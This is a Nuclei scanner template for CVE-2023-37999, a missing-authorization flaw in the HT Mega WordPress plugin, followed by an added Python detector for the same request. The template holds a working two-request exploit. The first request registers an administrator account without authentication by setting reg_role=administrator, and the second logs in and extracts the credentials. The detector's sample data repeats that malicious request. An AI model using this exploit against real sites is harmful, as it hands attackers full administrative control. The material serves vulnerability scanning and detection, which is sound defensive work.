id: CVE-2023-37999

info:
  name: HT Mega – Absolute Addons for Elementor <= 2.2.0 - Missing Authorization to Privilege Escalation
  author: daffainfo
  severity: critical
  description: |
    The HT Mega plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 2.2.0. This is due to missing validation of the reg_role parameter on the htmega_ajax_register function. This makes it possible for unauthenticated attackers to create administrator accounts.
  impact: |
    Attackers can escalate privileges, gaining unauthorized access to restricted functionalities or data.
  remediation: |
    Update to the latest version of HT Mega to address the privilege management issue.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-mega-for-elementor/ht-mega-absolute-addons-for-elementor-220-missing-authorization-to-privilege-escalation
    - https://plugins.trac.wordpress.org/changeset/2934204/ht-mega-for-elementor/trunk/includes/helper-function.php?contextall=1&old=2899662&old_path=%2Fht-mega-for-elementor%2Ftrunk%2Fincludes%2Fhelper-function.php
    - https://patchstack.com/database/vulnerability/ht-mega-for-elementor/wordpress-ht-mega-absolute-addons-for-elementor-plugin-2-2-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37999
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37999
    cwe-id: CWE-269
    epss-score: 0.5198
    epss-percentile: 0.97963
    cpe: cpe:2.3:a:hasthemes:ht_mega:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: hasthemes
    product: ht_mega
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ht-mega-for-elementor"
  tags: cve,cve2023,wordpress,wp,wp-plugin,hasthemes,ht_mega,vkev,ht-mega-for-elementor

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"

flow: http(1) && http(2)

http:
  # Request 1: unauthenticated self-registration via the plugin's AJAX handler.
  # reg_role is taken from the request unchecked, so "administrator" is honoured.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        reg_name={{username}}&reg_password={{password}}&reg_email={{email}}&reg_role=administrator

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Successfully Register")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Request 2: log in with the account just created and confirm the session
  # cookie is set and the redirect lands in /wp-admin.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Login

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(header,"wordpress_logged_in", "/wp-admin")'
          - 'status_code == 302'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Username: " + username + ". Password: "+ password'
# digest: 4a0a00473045022100f5d487a7089cf295afe8971ca036c25a10f0de125df07306ed3cfa12f1f41d65022059167065a19c4446dec7ff50d5e0596c263abdca0fe1ee91c263e1ebd9cbc6d1:922c64590222798bb761d5b6d8e72950
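The template above is the offensive check. The defensive counterpart, added here as an example and not part of the Nuclei template or of the HT Mega plugin, is a small detector that looks for the same request shape: a POST to admin-ajax.php with action=htmega_ajax_register whose reg_role asks for anything other than the default self-registration role. Because reg_role travels in the POST body, an ordinary access log is not enough; the input has to be a proxy or WAF capture that includes the body. The allow-list (subscriber only), the sample requests and the hostnames are assumptions constructed for this example.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption for this example: self-registration may only request WordPress's
# default new-user role. Anything else through htmega_ajax_register is suspicious.
ALLOWED_SELF_REG_ROLES = {"subscriber"}

# Constructed sample of raw HTTP requests as a reverse proxy or WAF might capture
# them (not real traffic). The first one mirrors the template's first request.
SAMPLE_REQUESTS = [
    "POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "reg_name=qwerty&reg_password=hunter22&reg_email=x@y.com&reg_role=administrator",
    # Benign registration through the same endpoint.
    "POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "reg_name=alice&reg_password=s3cret&reg_email=alice@example.org&reg_role=subscriber",
    # Unrelated admin-ajax call that must not trip the rule.
    "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "data=1",
]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers and form body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qs returns lists; keep the first value of each parameter.
    return {
        "method": method,
        "path": parts.path,
        "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
        "headers": headers,
        "form": {k: v[0] for k, v in parse_qs(body).items()},
    }


def is_htmega_register_abuse(req: dict) -> bool:
    """True when an htmega_ajax_register call asks for a role outside the allow-list."""
    if req["method"] != "POST" or not req["path"].endswith("/wp-admin/admin-ajax.php"):
        return False
    if req["query"].get("action") != "htmega_ajax_register":
        return False
    role = req["form"].get("reg_role")
    if role is None:
        # No explicit role requested; nothing to judge here.
        return False
    return role.strip().lower() not in ALLOWED_SELF_REG_ROLES


def scan(raw_requests):
    """Return (index, requested role, reg_name) for every request that trips the rule."""
    hits = []
    for i, raw in enumerate(raw_requests):
        req = parse_request(raw)
        if is_htmega_register_abuse(req):
            hits.append((i, req["form"].get("reg_role"), req["form"].get("reg_name")))
    return hits


if __name__ == "__main__":
    for idx, role, name in scan(SAMPLE_REQUESTS):
        print(f"request #{idx}: htmega_ajax_register asked for role {role!r} (reg_name={name!r})")
```

A hit on a host still running HT Mega <= 2.2.0 should be treated as a likely successful account creation: the next thing to check is whether a user with that reg_name exists and whether it has since logged in, which is exactly what the template's second request does from the attacker's side.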